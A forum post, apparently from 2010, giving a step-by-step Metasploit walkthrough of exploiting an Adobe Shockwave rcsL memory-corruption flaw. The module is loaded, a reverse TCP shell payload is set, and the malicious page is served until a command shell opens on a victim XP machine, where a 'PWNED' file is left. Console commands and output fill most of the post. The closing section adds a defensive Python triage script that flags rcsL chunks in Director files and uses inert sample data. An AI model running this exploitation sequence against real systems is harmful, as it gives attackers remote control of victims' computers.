Sun Oct 31, 2010 9:17 pm
Well folks, I bring you adobe_shockwave_rcsl_corruption, a 0day that came out recently (21/10/2010) and that you can already enjoy courtesy of the Metasploit people, who don't miss a thing. From what I've been reading it works on XP as well as on Vista and Seven (I only tested it on XP). The tutorial was made by rus0pr0; I was going to write one myself, but he beat me to it. For anyone who wants a bit more information, here is the link:
[You must be registered and logged in to see this link]
OK, on to the fun part: sudo ./msfconsole and we begin:
Code:
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 615 exploits - 306 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r10780 updated today (2010.10.22)
msf > use windows/browser/adobe_shockwave_rcsl_corruption
msf exploit(adobe_shockwave_rcsl_corruption) > info
Name: Adobe Shockwave rcsL Memory Corruption
Version: 10779
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
David Kennedy "ReL1K"
Available targets:

Id  Name
--  ----
0   Automatic

Basic options:

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SRVHOST     0.0.0.0          yes       The local host to listen on.
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                      no        The URI to use for this exploit (default is random)
Payload information:
Space: 1024
Avoid: 4 characters
Description:
This module exploits a weakness in the Adobe Shockwave player's
handling of Director movies (.DIR). A memory corruption
vulnerability occurs through an undocumented rcsL chunk. This
vulnerability was discovered by http://www.abysssec.com.
References:
http://www.exploit-db.com/sploits/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip
Let's look at the payloads we can use:
Code:
msf exploit(adobe_shockwave_rcsl_corruption) > show payloads
Compatible Payloads
===================
Name                                            Disclosure Date  Rank    Description
----                                            ---------------  ----    -----------
generic/debug_trap                                               normal  Generic x86 Debug Trap
generic/shell_bind_tcp                                           normal  Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp                                        normal  Generic Command Shell, Reverse TCP Inline
generic/tight_loop                                               normal  Generic x86 Tight Loop
windows/dllinject/bind_ipv6_tcp                                  normal  Reflective Dll Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp                                  normal  Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp                                       normal  Reflective Dll Injection, Bind TCP Stager
windows/dllinject/reverse_http                                   normal  Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager
windows/dllinject/reverse_ipv6_tcp                               normal  Reflective Dll Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp                               normal  Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp                                normal  Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp                                    normal  Reflective Dll Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports                           normal  Reflective Dll Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns                                normal  Reflective Dll Injection, Reverse TCP Stager (DNS)
windows/download_exec                                            normal  Windows Executable Download and Execute
windows/exec                                                     normal  Windows Execute Command
windows/messagebox                                               normal  Windows MessageBox
windows/meterpreter/bind_ipv6_tcp                                normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp                                normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp                                     normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/reverse_http                                 normal  Windows Meterpreter (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
windows/meterpreter/reverse_https                                normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_ipv6_tcp                             normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp                             normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports                         normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
windows/metsvc_bind_tcp                                          normal  Windows Meterpreter Service, Bind TCP
windows/metsvc_reverse_tcp                                       normal  Windows Meterpreter Service, Reverse TCP Inline
windows/patchupdllinject/bind_ipv6_tcp                           normal  Windows Inject DLL, Bind TCP Stager (IPv6)
windows/patchupdllinject/bind_nonx_tcp                           normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp                                normal  Windows Inject DLL, Bind TCP Stager
windows/patchupdllinject/reverse_ipv6_tcp                        normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp                        normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp                         normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_tcp                             normal  Windows Inject DLL, Reverse TCP Stager
windows/patchupdllinject/reverse_tcp_allports                    normal  Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns                         normal  Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupmeterpreter/bind_ipv6_tcp                         normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
windows/patchupmeterpreter/bind_nonx_tcp                         normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
windows/patchupmeterpreter/bind_tcp                              normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager
windows/patchupmeterpreter/reverse_ipv6_tcp                      normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp                      normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp                       normal  Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp                           normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports                  normal  Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns                       normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
windows/shell/bind_ipv6_tcp                                      normal  Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp                                      normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp                                           normal  Windows Command Shell, Bind TCP Stager
windows/shell/reverse_http                                       normal  Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager
windows/shell/reverse_ipv6_tcp                                   normal  Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp                                   normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp                                    normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp                                        normal  Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports                               normal  Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns                                    normal  Windows Command Shell, Reverse TCP Stager (DNS)
windows/shell_bind_tcp                                           normal  Windows Command Shell, Bind TCP Inline
windows/shell_bind_tcp_xpfw                                      normal  Windows Disable Windows ICF, Command Shell, Bind TCP Inline
windows/shell_reverse_tcp                                        normal  Windows Command Shell, Reverse TCP Inline
windows/upexec/bind_ipv6_tcp                                     normal  Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp                                     normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp                                          normal  Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_http                                      normal  Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager
windows/upexec/reverse_ipv6_tcp                                  normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp                                  normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp                                   normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp                                       normal  Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports                              normal  Windows Upload/Execute, Reverse All-Port TCP Stager
windows/upexec/reverse_tcp_dns                                   normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
windows/vncinject/bind_ipv6_tcp                                  normal  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp                                  normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp                                       normal  VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_http                                   normal  VNC Server (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
windows/vncinject/reverse_ipv6_tcp                               normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp                               normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp                                normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports                           normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
windows/vncinject/reverse_tcp_dns                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
We set the payload, fill in the information we need and check that everything is OK:
Code:
msf exploit(adobe_shockwave_rcsl_corruption) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(adobe_shockwave_rcsl_corruption) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(adobe_shockwave_rcsl_corruption) > set URIPATH /
URIPATH => /
msf exploit(adobe_shockwave_rcsl_corruption) > set SRVPORT 80
SRVPORT => 80
msf exploit(adobe_shockwave_rcsl_corruption) > show options
Module options:

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SRVHOST     0.0.0.0          yes       The local host to listen on.
SRVPORT     80               yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH     /                no        The URI to use for this exploit (default is random)

Payload options (windows/shell/reverse_tcp):

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
EXITFUNC    process          yes       Exit technique: seh, thread, none, process
LHOST       192.168.1.101    yes       The listen address
LPORT       4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Automatic
All good, let's exploit it:
Code:
msf exploit(adobe_shockwave_rcsl_corruption) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.101:4444
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.101:80/
[*] Server started.
We pass the address to the browser:
Code:
msf exploit(adobe_shockwave_rcsl_corruption) >
[*] Sending exploit HTML to 192.168.1.100:1051...
[*] Sending exploit DIR to 192.168.1.100:1054...
[*] Sending stage (240 bytes) to 192.168.1.100
[*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.100:1055) at Fri Oct 22 07:22:58 -0300 2010
[*] Session ID 1 (192.168.1.101:4444 -> 192.168.1.100:1055) processing InitialAutoRunScript 'migrate -f'
[-] Error: Command shell sessions do not support migration
We have a shell now (ignore the error; it's because when the shell comes up it tries to migrate it to another process as if it were Meterpreter, but that can't be done with a plain shell).
Well, we look at the available sessions, interact, leave a greeting for the victim on the desktop and we're off.
Code:
msf exploit(adobe_shockwave_rcsl_corruption) > sessions
Active sessions
===============

Id  Type   Information  Connection
--  ----   -----------  ----------
1   shell               192.168.1.101:4444 -> 192.168.1.100:1055
msf exploit(adobe_shockwave_rcsl_corruption) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>echo "PWNED :), hasta la proxima" > pwned.txt
echo "PWNED :), hasta la proxima" > pwned.txt
C:\Documents and Settings\Administrator\Desktop>
[*] Command shell session 1 closed.
I hope this is useful to everyone. The author was skilmmax; now I bring it to you, Pitbull Security users!
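From the defender's side, the module description above is the useful part: the corruption is triggered by an undocumented rcsL chunk inside a Director movie (.DIR), and the console output shows the movie being served to the browser right after the exploit HTML. A handler who pulls a .DIR file out of a proxy cache or mail gateway therefore wants a quick triage tool that walks the container's chunks and flags an rcsL chunk without ever handing the file to Shockwave. The walker below is an added example written for this page, not code from the post, the tutorial's author, or Metasploit. It assumes the Director container layout as commonly documented: a RIFX (big-endian) or XFIR (little-endian, FourCCs byte-reversed) header, a four-byte form type, and a sequence of FourCC + 32-bit length chunks padded to even length. The sample files it builds are constructed, inert stand-ins with no real Director content and no exploit payload.

```python
import struct

SUSPICIOUS_CHUNKS = {"rcsL"}  # the undocumented chunk named in the module description


def _pad_even(n):
    """RIFF-style containers pad odd-sized chunk bodies to an even boundary."""
    return n + (n & 1)


def walk_director_chunks(data):
    """Return (form_type, chunks) for a RIFX/XFIR container.

    Each chunk is (fourcc, offset, declared_size, status) where status is
    "ok" or "truncated" (declared size runs past the end of the buffer).
    The walker never trusts a length field: it bounds every read by the
    buffer it was given and stops at the first chunk that overruns it.
    """
    if len(data) < 12:
        raise ValueError("too short to be a Director container")
    magic = data[0:4]
    if magic == b"RIFX":            # big-endian, FourCCs as written (assumption)
        endian, fix = ">", (lambda fcc: fcc)
    elif magic == b"XFIR":          # little-endian, FourCCs byte-reversed (assumption)
        endian, fix = "<", (lambda fcc: fcc[::-1])
    else:
        raise ValueError("not a RIFX/XFIR container: %r" % magic)

    declared_total = struct.unpack(endian + "I", data[4:8])[0]
    end = min(len(data), 8 + declared_total)   # never read past what we actually have
    form = fix(data[8:12]).decode("latin-1")

    chunks = []
    pos = 12
    while pos + 8 <= end:
        fcc = fix(data[pos:pos + 4]).decode("latin-1")
        size = struct.unpack(endian + "I", data[pos + 4:pos + 8])[0]
        if pos + 8 + size > end:
            chunks.append((fcc, pos, size, "truncated"))
            break
        chunks.append((fcc, pos, size, "ok"))
        pos += 8 + _pad_even(size)
    return form, chunks


def triage(data):
    """Summarise a container for an analyst: form type, chunk names, and which
    chunk names are on the watch list. A hit means 'look closer', not 'malicious'."""
    form, chunks = walk_director_chunks(data)
    names = [c[0] for c in chunks]
    return {
        "form": form,
        "chunks": names,
        "suspicious": [n for n in names if n in SUSPICIOUS_CHUNKS],
        "truncated": any(c[3] == "truncated" for c in chunks),
    }


def build_sample(little_endian=False):
    """Constructed test input: a minimal container with an ordinary 'imap'
    chunk followed by an 'rcsL' chunk of five filler bytes. It is not a real
    Director movie and carries nothing executable."""
    endian = "<" if little_endian else ">"

    def fcc(s):
        b = s.encode("ascii")
        return b[::-1] if little_endian else b

    body = fcc("MV93")
    body += fcc("imap") + struct.pack(endian + "I", 8) + b"\x00" * 8
    body += fcc("rcsL") + struct.pack(endian + "I", 5) + b"A" * 5 + b"\x00"  # odd size, one pad byte
    magic = b"XFIR" if little_endian else b"RIFX"
    return magic + struct.pack(endian + "I", len(body)) + body


if __name__ == "__main__":
    for le in (False, True):
        print("XFIR" if le else "RIFX", triage(build_sample(little_endian=le)))
    # A file cut short mid-chunk is reported as truncated instead of being over-read.
    print("cut", triage(build_sample()[:-3]))
```

Run it on a real capture with `triage(open(path, "rb").read())`; the point of the bounded walk is that a file crafted to lie about its chunk sizes, which is exactly the class of input this module produces, cannot make the triage tool itself misbehave.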